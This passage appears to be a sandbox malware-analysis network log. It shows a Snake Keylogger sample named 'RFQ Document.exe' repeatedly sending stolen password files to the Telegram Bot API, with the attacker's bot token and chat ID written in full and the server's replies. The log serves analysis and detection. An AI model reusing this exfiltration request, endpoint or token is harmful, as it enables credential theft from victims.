2021-09-28 05:59:38 UTC	392	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:38 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:38 UTC	392	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12834,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
247	192.168.2.4	50070	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:38 UTC	393	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255effbb41a Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:38 UTC	393	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 66 62 62 34 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255effbb41aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:38 UTC	393	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:38 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:38 UTC	394	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12835,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808778,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
248	192.168.2.4	50072	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:38 UTC	394	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f018515d Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:38 UTC	394	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 31 38 35 31 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f018515dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:38 UTC	395	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:38 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:38 UTC	395	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12836,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808778,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
249	192.168.2.4	50073	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:38 UTC	396	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f03027e0 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:38 UTC	396	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 33 30 32 37 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f03027e0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:38 UTC	396	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:38 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:38 UTC	397	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12837,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808778,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.4	49799	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:25 UTC	39	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c4e1c0b2 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:25 UTC	40	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 65 31 63 30 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c4e1c0b2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:25 UTC	40	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:25 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:25 UTC	40	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12605,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808705,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
250	192.168.2.4	50076	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:38 UTC	397	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f06e24ed Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:38 UTC	398	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 36 65 32 34 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f06e24edContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:38 UTC	398	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:38 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:38 UTC	398	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12838,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808778,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
251	192.168.2.4	50078	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:39 UTC	399	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f08ac29c Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:39 UTC	399	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 38 61 63 32 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f08ac29cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:39 UTC	400	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:39 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:39 UTC	400	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12839,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808779,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
252	192.168.2.4	50080	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:39 UTC	401	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f0a9c21a Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:39 UTC	401	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 61 39 63 32 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f0a9c21aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:39 UTC	401	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:39 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:39 UTC	402	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 39 2c 22 64 Data Ascii: 